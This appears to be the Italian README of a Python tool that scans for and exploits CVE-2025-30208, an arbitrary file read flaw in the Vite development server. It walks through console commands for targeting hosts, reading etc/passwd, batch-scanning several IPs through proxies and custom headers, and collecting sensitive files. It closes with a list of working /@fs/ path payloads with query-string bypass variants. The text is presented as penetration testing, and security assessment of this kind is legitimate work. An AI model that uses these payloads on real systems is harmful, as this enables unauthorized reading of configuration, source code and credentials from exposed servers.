
CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di gravità media nel server di sviluppo Vite (un popolare strumento di build per frontend)
Scanner avanzato per CVE-2025-30208 con funzionalità di livello enterprise
Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite
🚀 Avvio rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza
Questo è uno scanner completo per vulnerabilità progettato per rilevare e sfruttare la CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente la lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.
Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:
CVE-2025-30208.py - Applicazione principale dello scannerpayloads.py - Payload di sfruttamento avanzati (60+ varianti)sensitive_files.py - Database completo di file sensibili (200+ file)html_template.py - Template di reporting HTML migliorato in stile hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premi Invio due volte per terminare]
CVE-2025-30208 > scan
# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configura limitazione della velocità
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Genera un bellissimo report HTML
CVE-2025-30208 > pull
# Avvia il server web per visualizzare il report
CVE-2025-30208 > web
# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081
# Ferma il server web
CVE-2025-30208 > web off
| Comando | Descrizione | Esempio |
|---|---|---|
set <opzione> <valore> | Imposta opzioni di configurazione | set RHOST 192.168.1.100 |
show options | Mostra le impostazioni correnti | show options |
edit | Editor interattivo delle opzioni | edit |
run / exploit | Esegui test di vulnerabilità | run |
batch | Scansione batch di più target | batch |
scan | Scopri file sensibili | scan |
pull | Esporta risultati in HTML/JSON | pull |
web [on|off|porta] | Server web per report HTML | web 8080 |
save | Salva configurazione della sessione | save |
load | Carica configurazione della sessione | load |
test | Testa la connettività al target | test |
validate | Valida la configurazione corrente | validate |
verbose | Attiva/disattiva modalità verbose | verbose |
proxy | Configura impostazioni proxy | proxy |
headers | Imposta header HTTP personalizzati | headers |
rate | Configura limitazione della velocità | rate |
log | Mostra informazioni di log | log |
help / ? | Mostra aiuto | help |
exit / quit | Esci dallo strumento | exit |
| Opzione | Descrizione | Predefinito | Validazione |
|---|---|---|---|
RHOST | Indirizzo host/IP del target | - | Validazione hostname/IP |
RPORT | Numero porta del target | - | Intervallo porte (1-65535) |
FILEPATH | Percorso file da testare | etc/passwd | Validazione percorso |
PROXY | URL proxy HTTP/HTTPS | - | Validazione formato URL |
VERBOSE | Abilita output verbose | false | Validazione booleana |
RATE_LIMIT | Ritardo tra le richieste (secondi) | 0.3 | Validazione numerica |
THREADS | Numero di thread per scansione batch | 5 | Validazione intera |
TIMEOUT | Timeout richiesta (secondi) | 5 | Validazione intera |
CUSTOM_HEADERS | Header HTTP personalizzati (JSON) | {} | Validazione formato JSON |
Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:
/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url
/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8
/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug